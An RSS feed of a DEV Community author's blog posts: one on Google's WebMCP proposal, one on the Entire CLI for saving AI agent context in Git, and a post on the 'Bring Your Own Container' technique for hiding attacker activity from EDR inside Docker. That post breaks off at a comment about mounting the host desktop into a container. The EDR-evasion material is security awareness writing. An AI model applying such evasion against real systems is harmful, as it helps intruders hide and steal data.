<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: KABUKI</title>
    <description>The latest articles on DEV Community by KABUKI (@kabuki_engineer).</description>
    <link>https://dev.to/kabuki_engineer</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3835787%2Fa0383df0-16fc-430b-a166-fd3dc6fea3f0.png</url>
      <title>DEV Community: KABUKI</title>
      <link>https://dev.to/kabuki_engineer</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kabuki_engineer"/>
    <language>en</language>
    <item>
      <title>Your AI Agent Has Been Lying to Your Website — Google's WebMCP Wants to Fix That</title>
      <dc:creator>KABUKI</dc:creator>
      <pubDate>Tue, 24 Mar 2026 13:49:12 +0000</pubDate>
      <link>https://dev.to/kabuki_engineer/your-ai-agent-has-been-lying-to-your-website-googles-webmcp-wants-to-fix-that-50a</link>
      <guid>https://dev.to/kabuki_engineer/your-ai-agent-has-been-lying-to-your-website-googles-webmcp-wants-to-fix-that-50a</guid>
      <description>&lt;p&gt;tags: ai, webdev, javascript, googledev&lt;/p&gt;

&lt;h2&gt;
  
  
  🗒️ TL;DR
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;AI agents currently interact with websites by &lt;strong&gt;simulating UI actions&lt;/strong&gt; — fragile, slow, and invisible to the site itself&lt;/li&gt;
&lt;li&gt;Google released an early preview of &lt;strong&gt;WebMCP&lt;/strong&gt;, a new web standard to fix this&lt;/li&gt;
&lt;li&gt;WebMCP lets websites &lt;strong&gt;expose structured JavaScript tools&lt;/strong&gt; that agents call directly — no more fake clicks&lt;/li&gt;
&lt;li&gt;It proposes &lt;strong&gt;two new APIs&lt;/strong&gt;: a Declarative API (HTML forms) and an Imperative API (JavaScript)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Human-in-the-loop is a core design principle&lt;/strong&gt; — fully autonomous agents are explicitly out of scope&lt;/li&gt;
&lt;li&gt;WebMCP is &lt;strong&gt;not a replacement for MCP&lt;/strong&gt; — they complement each other (backend vs. frontend layer)&lt;/li&gt;
&lt;li&gt;Security considerations (model poisoning, cross-origin isolation, permissions) are already on the radar&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🤖 The Problem: AI Agents Are "Faking" Web Interactions
&lt;/h2&gt;

&lt;p&gt;Picture this: you ask your AI agent to book a flight. Behind the scenes, it's doing something like this:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Simulate a click on the search field&lt;/li&gt;
&lt;li&gt;Type in the destination character by character&lt;/li&gt;
&lt;li&gt;Wait for the DOM to update&lt;/li&gt;
&lt;li&gt;Parse the rendered HTML to find the results&lt;/li&gt;
&lt;li&gt;Simulate another click on the "Book" button&lt;/li&gt;
&lt;li&gt;Hope nothing changed since last time&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This approach — often called browser automation — works well enough for demos. But in production? It's a mess.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The website has no idea an agent is interacting with it.&lt;/strong&gt; There's no handshake, no contract, no structure. The agent is just guessing what to do based on what it can see.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Any UI update can silently break the workflow. Error messages are vague. There's no way for the site to say "hey, here's the right way to do this." And performance is terrible compared to direct API calls.&lt;/p&gt;

&lt;p&gt;The web was built for humans. AI agents have been crashing the party uninvited — and faking their way through every interaction.&lt;/p&gt;




&lt;h2&gt;
  
  
  📢 What Google Just Announced
&lt;/h2&gt;

&lt;p&gt;On &lt;strong&gt;February 10, 2026&lt;/strong&gt;, Google released an early preview of &lt;strong&gt;WebMCP&lt;/strong&gt; — a proposed web standard designed to give AI agents a proper seat at the table.&lt;/p&gt;

&lt;p&gt;The core idea:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"WebMCP provides a standard way for web applications to expose structured tools, so AI agents can interact with websites faster, more reliably, and more accurately."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Instead of agents reverse-engineering your UI, &lt;strong&gt;your website gets to define exactly how agents should interact with it.&lt;/strong&gt; Flight booking, support ticket submission, complex data navigation — all of these become structured, predictable, and auditable.&lt;/p&gt;

&lt;p&gt;The spec is open. The &lt;a href="https://github.com/webmachinelearning/webmcp" rel="noopener noreferrer"&gt;GitHub repo is public&lt;/a&gt;. And it's already generating serious discussion in the web standards community.&lt;/p&gt;




&lt;h2&gt;
  
  
  ⚙️ How WebMCP Works
&lt;/h2&gt;

&lt;p&gt;The key shift WebMCP introduces is simple but powerful: &lt;strong&gt;websites publish structured tools, agents call those tools directly.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's how it compares to the current state of affairs:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;How the Agent Interacts&lt;/th&gt;
&lt;th&gt;Reliability&lt;/th&gt;
&lt;th&gt;Speed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Traditional UI automation&lt;/td&gt;
&lt;td&gt;Simulates clicks &amp;amp; keystrokes&lt;/td&gt;
&lt;td&gt;❌ Breaks on any UI change&lt;/td&gt;
&lt;td&gt;🐢 Slow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WebMCP&lt;/td&gt;
&lt;td&gt;Calls structured JavaScript tools directly&lt;/td&gt;
&lt;td&gt;✅ Stable &amp;amp; predictable&lt;/td&gt;
&lt;td&gt;⚡ Fast&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;WebMCP proposes &lt;strong&gt;two new browser APIs&lt;/strong&gt; to make this work:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Declarative API&lt;/strong&gt; — handles standard actions defined directly in HTML forms. Think of it as a machine-readable &lt;code&gt;&amp;lt;form&amp;gt;&lt;/code&gt; that agents understand natively.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Imperative API&lt;/strong&gt; — handles more complex, dynamic interactions that require JavaScript execution. For everything that can't be expressed declaratively.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Together, these APIs let you make your web app &lt;strong&gt;"agent-ready"&lt;/strong&gt; — without throwing away your existing codebase. In fact, one of the explicit design goals is to let you &lt;strong&gt;reuse existing JavaScript code&lt;/strong&gt; to create tools. Low migration cost, high payoff.&lt;/p&gt;




&lt;h2&gt;
  
  
  🎯 Design Goals (and What's Out of Scope)
&lt;/h2&gt;

&lt;p&gt;WebMCP has four stated design goals. They're worth reading carefully, because they tell you a lot about what Google is (and isn't) trying to build.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Human-in-the-loop workflows&lt;/strong&gt;&lt;br&gt;
Users delegate tasks to AI agents while maintaining visibility and control. The agent assists — it doesn't replace the human.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Simplified AI agent integration&lt;/strong&gt;&lt;br&gt;
Agents interact through well-defined JavaScript tools, not brittle UI scraping. Reliable by design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Minimal developer burden&lt;/strong&gt;&lt;br&gt;
Reuse your existing page JavaScript to create tools. You don't have to rebuild your app from scratch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Improved accessibility&lt;/strong&gt;&lt;br&gt;
Assistive technologies get a standardized way to access web app functionality — a nice side effect with real-world impact.&lt;/p&gt;

&lt;h3&gt;
  
  
  🚫 What WebMCP is NOT trying to do
&lt;/h3&gt;

&lt;p&gt;This is just as important. WebMCP explicitly rules out:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Headless browsing without human oversight&lt;/strong&gt; — no ghost agents running in the background&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fully autonomous agent workflows&lt;/strong&gt; — for that, Google points to the &lt;strong&gt;A2A (Agent-to-Agent) protocol&lt;/strong&gt; instead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replacing MCP or backend integrations&lt;/strong&gt; — WebMCP lives at the frontend layer only&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replacing human-facing interfaces&lt;/strong&gt; — your UI is still for humans&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent discoverability&lt;/strong&gt; — figuring out which tools exist isn't WebMCP's job&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  🔐 Security considerations already on the table
&lt;/h3&gt;

&lt;p&gt;The spec also flags three security areas that need careful handling:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Model poisoning&lt;/strong&gt; — malicious tool definitions could corrupt AI model behavior&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cross-origin isolation&lt;/strong&gt; — tool calls across different origins need strict security boundaries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Permission management&lt;/strong&gt; — who decides which agents can call which tools, and when?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't solved problems yet. But the fact that they're called out explicitly in the early spec is a good sign.&lt;/p&gt;




&lt;h2&gt;
  
  
  🔄 WebMCP vs MCP: It's Not a Competition
&lt;/h2&gt;

&lt;p&gt;If you've been working with MCP (Model Context Protocol, originally from Anthropic), you might be wondering: &lt;em&gt;"Wait, don't I already have this?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Not quite. Here's how the landscape looks:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;How Agents Interact with the Web&lt;/th&gt;
&lt;th&gt;Website's Role&lt;/th&gt;
&lt;th&gt;Reliability&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Before MCP&lt;/td&gt;
&lt;td&gt;DOM scraping &amp;amp; click simulation&lt;/td&gt;
&lt;td&gt;Passive victim&lt;/td&gt;
&lt;td&gt;❌ Fragile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;After MCP&lt;/td&gt;
&lt;td&gt;Direct backend API calls&lt;/td&gt;
&lt;td&gt;Backend responds&lt;/td&gt;
&lt;td&gt;✅ (backend only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;After WebMCP&lt;/td&gt;
&lt;td&gt;Structured tool calls on the UI layer&lt;/td&gt;
&lt;td&gt;Frontend + backend both respond&lt;/td&gt;
&lt;td&gt;✅ Fast &amp;amp; full-stack&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The clean mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MCP&lt;/strong&gt; = agents talking directly to your &lt;strong&gt;backend services&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WebMCP&lt;/strong&gt; = agents interacting with your &lt;strong&gt;frontend UI layer&lt;/strong&gt;, with the user present and in control&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;They're not competing. They're covering different parts of the stack. A website using WebMCP can be thought of as an &lt;strong&gt;MCP server implemented in client-side JavaScript&lt;/strong&gt; — with the key difference that the user, the app, and the agent all share context in real time.&lt;/p&gt;




&lt;h2&gt;
  
  
  🏭 A Real-World Engineer's Take
&lt;/h2&gt;

&lt;p&gt;I work in the semiconductor and manufacturing space, where AI agents are increasingly being used for things like equipment parameter tuning, defect analysis, and navigating complex ERP systems.&lt;/p&gt;

&lt;p&gt;And the UI automation problem is very real in industrial settings.&lt;/p&gt;

&lt;p&gt;Manufacturing control panels, MES systems, and legacy ERP dashboards were never designed with AI agents in mind. Every time the software gets updated and the layout shifts, automated workflows break silently. There are no logs. No audit trail. No way to know &lt;em&gt;what&lt;/em&gt; the agent actually did or &lt;em&gt;why&lt;/em&gt; it did it.&lt;/p&gt;

&lt;p&gt;In regulated industries, that's not just inconvenient — it's a compliance problem.&lt;/p&gt;

&lt;p&gt;WebMCP's approach of &lt;strong&gt;letting the application define how agents should interact with it&lt;/strong&gt; resonates deeply in this context. It shifts the relationship from "agent guessing at UI" to "application and agent speaking the same language."&lt;/p&gt;

&lt;p&gt;And the &lt;strong&gt;Human-in-the-loop&lt;/strong&gt; principle? In manufacturing, fully autonomous agents controlling physical equipment face enormous psychological and regulatory hurdles. The model of "human supervises, agent assists" isn't just a nice idea — it's the only model that's realistically deployable today.&lt;/p&gt;

&lt;p&gt;The question every engineering team should be asking isn't &lt;em&gt;"can our AI agent use our app?"&lt;/em&gt; — it's &lt;em&gt;"have we designed our app to work **with&lt;/em&gt;* AI agents?"*&lt;/p&gt;

&lt;p&gt;That distinction is going to matter a lot in the next few years.&lt;/p&gt;




&lt;h2&gt;
  
  
  ✅ What You Should Do Now
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Bottom line: The web is about to get a first-class agent interface layer. Now is the time to get ahead of it.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's where to start:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📖 &lt;strong&gt;Read the spec&lt;/strong&gt; — check out the &lt;a href="https://github.com/webmachinelearning/webmcp" rel="noopener noreferrer"&gt;WebMCP GitHub repo&lt;/a&gt; and follow the discussion&lt;/li&gt;
&lt;li&gt;🗂️ &lt;strong&gt;Audit your own apps&lt;/strong&gt; — which features would you &lt;em&gt;want&lt;/em&gt; an agent to use? Map those out now&lt;/li&gt;
&lt;li&gt;🔀 &lt;strong&gt;Clarify your MCP vs WebMCP strategy&lt;/strong&gt; — backend integrations vs. UI-layer interactions are different problems&lt;/li&gt;
&lt;li&gt;🔐 &lt;strong&gt;Update your AI security checklist&lt;/strong&gt; — model poisoning and permission management aren't theoretical anymore&lt;/li&gt;
&lt;li&gt;👥 &lt;strong&gt;Design for Human-in-the-loop from day one&lt;/strong&gt; — don't build agent features that assume no human is watching&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If MCP changed how agents talk to your backend, WebMCP is coming for your frontend.&lt;/p&gt;




&lt;h2&gt;
  
  
  📚 Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a class="mentioned-user" href="https://dev.to/it"&gt;@it&lt;/a&gt; (ITmedia): &lt;em&gt;"Google releases early preview of 'WebMCP' to standardize AI agent web interactions"&lt;/em&gt; (2026/03/18)&lt;/li&gt;
&lt;li&gt;WebMCP GitHub Repository: &lt;a href="https://github.com/webmachinelearning/webmcp" rel="noopener noreferrer"&gt;https://github.com/webmachinelearning/webmcp&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>Git Remembers What Changed — But Not Why. Entire CLI Is Here to Fix That</title>
      <dc:creator>KABUKI</dc:creator>
      <pubDate>Mon, 23 Mar 2026 13:44:43 +0000</pubDate>
      <link>https://dev.to/kabuki_engineer/git-remembers-what-changed-but-not-why-entire-cli-is-here-to-fix-that-4lkh</link>
      <guid>https://dev.to/kabuki_engineer/git-remembers-what-changed-but-not-why-entire-cli-is-here-to-fix-that-4lkh</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Current software development lifecycles were &lt;strong&gt;built for humans,
not AI agents&lt;/strong&gt; — and it's showing&lt;/li&gt;
&lt;li&gt;AI agent sessions are volatile: the &lt;strong&gt;reasoning behind code changes
disappears the moment the session ends&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Former GitHub CEO Thomas Dohmke launched &lt;strong&gt;Entire&lt;/strong&gt;, raising
&lt;strong&gt;$60M in seed funding&lt;/strong&gt; (post-money valuation: $300M)&lt;/li&gt;
&lt;li&gt;The open-source &lt;strong&gt;Entire CLI&lt;/strong&gt; automatically saves AI agent context
— prompts, transcripts, tool calls — directly into Git&lt;/li&gt;
&lt;li&gt;The goal: a platform where &lt;strong&gt;AI agents and humans co-develop
software&lt;/strong&gt; with full traceability&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background: The Memory Problem No One Is Talking About
&lt;/h2&gt;

&lt;p&gt;Claude Code. GPT-5.3-Codex. Cursor Composer 1.5.&lt;/p&gt;

&lt;p&gt;AI coding agents are changing how we build software. Engineers now&lt;br&gt;
run multiple terminal windows, fire prompts at agents, and let them&lt;br&gt;
generate, evaluate, and iterate on code autonomously.&lt;/p&gt;

&lt;p&gt;But there's a problem hiding in plain sight.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Every AI agent session is volatile.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The prompt lives in your terminal. The reasoning lives in the context&lt;br&gt;
window. The decision-making process — the &lt;em&gt;why&lt;/em&gt; behind each change —&lt;br&gt;
evaporates the moment the session closes.&lt;/p&gt;

&lt;p&gt;You retrace steps. Re-enter decisions. Burn tokens re-explaining&lt;br&gt;
context. The background behind a judgment made hours or days ago?&lt;br&gt;
Gone.&lt;/p&gt;

&lt;p&gt;Git tells you &lt;em&gt;what&lt;/em&gt; changed.&lt;br&gt;
&lt;strong&gt;Git has never been able to tell you &lt;em&gt;why&lt;/em&gt;.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's the gap Thomas Dohmke — former GitHub CEO — is building&lt;br&gt;
Entire to close.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Just Happened: $60M and a New Company
&lt;/h2&gt;

&lt;p&gt;On February 10, 2026, Entire announced a &lt;strong&gt;$60 million seed round&lt;/strong&gt;,&lt;br&gt;
with a post-money valuation of &lt;strong&gt;$300 million&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The thesis is straightforward: today's development tools were designed&lt;br&gt;
for human-to-human collaboration, built before the cloud — let alone&lt;br&gt;
before AI agents existed. They weren't designed for a world where&lt;br&gt;
AI agents are primary contributors.&lt;/p&gt;

&lt;p&gt;Entire wants to rebuild the software development lifecycle from the&lt;br&gt;
ground up, with AI and humans as co-authors.&lt;/p&gt;




&lt;h2&gt;
  
  
  Entire CLI: Making AI Reasoning a First-Class Git Citizen
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Entire CLI&lt;/strong&gt; is an open-source tool available on GitHub. Its core&lt;br&gt;
feature is called &lt;strong&gt;Checkpoints&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Every time an AI agent generates code and commits it, Entire CLI&lt;br&gt;
automatically captures the full session context and attaches it to&lt;br&gt;
the commit:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What Gets Recorded&lt;/th&gt;
&lt;th&gt;Details&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Full transcript&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The entire agent conversation log&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Prompts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Every instruction sent to the agent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Changed files&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Code diffs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token usage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;How many tokens were consumed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tool calls&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Every tool the agent invoked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The result: not just a record of &lt;em&gt;what&lt;/em&gt; changed, but a traceable&lt;br&gt;
history of &lt;strong&gt;the reasoning that produced the change.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Platform Architecture: 3 Layers
&lt;/h2&gt;

&lt;p&gt;Entire CLI's platform is built on three components:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;① Git-Compatible Database&lt;/strong&gt;&lt;br&gt;
Code, intent, decisions, and reasoning — all managed in a single&lt;br&gt;
version control system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;② Universal Semantic Reasoning Layer&lt;/strong&gt;&lt;br&gt;
A context graph (a network mapping relationships between contexts)&lt;br&gt;
enables multi-agent collaboration across sessions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;③ AI-Native Software Development Lifecycle&lt;/strong&gt;&lt;br&gt;
The entire dev lifecycle rebuilt around the assumption that agents&lt;br&gt;
and humans work together — not humans alone.&lt;/p&gt;

&lt;p&gt;Currently supports &lt;strong&gt;Claude Code&lt;/strong&gt; and &lt;strong&gt;Google Gemini CLI&lt;/strong&gt;, with&lt;br&gt;
OpenAI Codex, Cursor CLI, OpenCode, and GitHub Copilot CLI support&lt;br&gt;
coming soon.&lt;/p&gt;




&lt;h2&gt;
  
  
  A Brief History of Version Control
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;What We Could Track&lt;/th&gt;
&lt;th&gt;What We Couldn't&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Before Git&lt;/td&gt;
&lt;td&gt;Manual file backups&lt;/td&gt;
&lt;td&gt;Change history&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Git era&lt;/td&gt;
&lt;td&gt;Code changes &amp;amp; diffs&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;The reasoning behind them&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entire CLI era&lt;/td&gt;
&lt;td&gt;Code changes + &lt;strong&gt;AI reasoning &amp;amp; context&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Git revolutionized how we record &lt;em&gt;changes&lt;/em&gt;.&lt;br&gt;
Entire CLI wants to revolutionize how we record &lt;em&gt;decisions&lt;/em&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  A Hardware Engineer's Perspective
&lt;/h2&gt;

&lt;p&gt;As a semiconductor engineer, traceability isn't optional — it's a&lt;br&gt;
compliance requirement. When something goes wrong on a production&lt;br&gt;
line, you need to explain every design decision, every change, and&lt;br&gt;
every judgment call. "The AI suggested it" is not an acceptable&lt;br&gt;
answer.&lt;/p&gt;

&lt;p&gt;This is what makes Entire CLI's approach genuinely interesting to me.&lt;/p&gt;

&lt;p&gt;The problem it's solving isn't unique to software development.&lt;br&gt;
Anywhere AI is being used to make or assist with technical decisions,&lt;br&gt;
the same gap exists: &lt;strong&gt;the output survives, but the reasoning&lt;br&gt;
doesn't.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In semiconductor and manufacturing environments, I see this playing&lt;br&gt;
out already:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AI-assisted design verification produces results, but &lt;strong&gt;the
diagnostic path that led there isn't preserved&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Failure analysis with AI support surfaces insights, but
&lt;strong&gt;the chain of reasoning disappears after the session&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;When auditors or quality reviewers ask "why was this decision
made?", the honest answer is often: &lt;strong&gt;"we don't know anymore"&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Treating AI as a disposable tool — use it, get the output, move on —&lt;br&gt;
works until it doesn't. The moment traceability matters (and in&lt;br&gt;
engineering, it always eventually matters), you'll wish you'd&lt;br&gt;
recorded the &lt;em&gt;why&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Entire CLI is a software-first answer to a problem that exists&lt;br&gt;
across all of engineering.&lt;/p&gt;




&lt;h2&gt;
  
  
  Takeaways &amp;amp; Next Actions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Bottom line: The next frontier isn't just AI-generated code.&lt;br&gt;
It's AI-generated code with traceable reasoning.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what to do now:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Try Entire CLI locally&lt;/strong&gt; — it's open source and available on
GitHub right now&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit your current AI agent workflow&lt;/strong&gt; — can you reconstruct
&lt;em&gt;why&lt;/em&gt; a decision was made a week later? If not, that's the gap&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add "context preservation" to your team's AI usage guidelines&lt;/strong&gt;
— before it becomes a problem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If you use Claude Code or Gemini CLI&lt;/strong&gt;, Entire CLI integrates
today — no waiting required&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Git changed how we collaborate on &lt;em&gt;what&lt;/em&gt; we build.&lt;br&gt;
Entire CLI might change how we understand &lt;em&gt;why&lt;/em&gt; we built it that way.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources:&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;&lt;a class="mentioned-user" href="https://dev.to/it"&gt;@it&lt;/a&gt; — "Git Can't Record 'Why' — Former GitHub CEO Launches&lt;/em&gt;
&lt;em&gt;Entire CLI" (March 18, 2026)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Entire Official Blog — "Hello Entire World"&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Entire Blog — Dispatch series (Feb–Mar 2026)&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>git</category>
      <category>agents</category>
      <category>devops</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Your Docker Is Someone Else's Hideout — The EDR Bypass Technique No One Talks About</title>
      <dc:creator>KABUKI</dc:creator>
      <pubDate>Sun, 22 Mar 2026 10:08:41 +0000</pubDate>
      <link>https://dev.to/kabuki_engineer/your-docker-is-someone-elses-hideout-the-edr-bypass-technique-no-one-talks-about-34an</link>
      <guid>https://dev.to/kabuki_engineer/your-docker-is-someone-elses-hideout-the-edr-bypass-technique-no-one-talks-about-34an</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;A technique called &lt;strong&gt;BYOC (Bring Your Own Container)&lt;/strong&gt; uses Docker
to completely bypass EDR detection&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;"isolation" feature built for security&lt;/strong&gt; becomes the attacker's
perfect hiding spot&lt;/li&gt;
&lt;li&gt;North Korea-linked group &lt;strong&gt;"TraderTraitor" already used this in
real attacks&lt;/strong&gt; against macOS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Windows Sandbox&lt;/strong&gt; has the same problem — same concept, different tool&lt;/li&gt;
&lt;li&gt;Docker's trustworthiness is exactly what makes it dangerous&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background: Why Docker Became an Attacker's Best Friend
&lt;/h2&gt;

&lt;p&gt;Docker is everywhere. It's the tool developers trust, use daily, and&lt;br&gt;
rarely question. That trust is precisely the problem.&lt;/p&gt;

&lt;p&gt;EDR (Endpoint Detection and Response) tools work by flagging suspicious&lt;br&gt;
processes. But a &lt;code&gt;docker run&lt;/code&gt; command? That's just a developer doing&lt;br&gt;
their job. EDR can't easily tell the difference between legitimate&lt;br&gt;
container work and an attacker hiding inside one.&lt;/p&gt;

&lt;p&gt;This is BYOC — &lt;strong&gt;Bring Your Own Container&lt;/strong&gt; — a technique presented&lt;br&gt;
at AVTOKYO2024 by Taiichi Kotake of Stella Security. It takes the&lt;br&gt;
"Living off the Land" (LotL) philosophy — abusing trusted, pre-installed&lt;br&gt;
tools — and applies it to Docker.&lt;/p&gt;

&lt;p&gt;The result: a fully functional attack environment that EDR doesn't see.&lt;/p&gt;


&lt;h2&gt;
  
  
  How the Attack Works: 2 Steps, Clean Execution
&lt;/h2&gt;

&lt;p&gt;BYOC breaks down into two phases: &lt;strong&gt;getting data in&lt;/strong&gt; and&lt;br&gt;
&lt;strong&gt;getting data out&lt;/strong&gt;.&lt;/p&gt;


&lt;h3&gt;
  
  
  Phase 1: Smuggling Data Into the Container
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Method A: Mount the Host Directory&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Mount the host desktop directly into the container&lt;/span&gt;
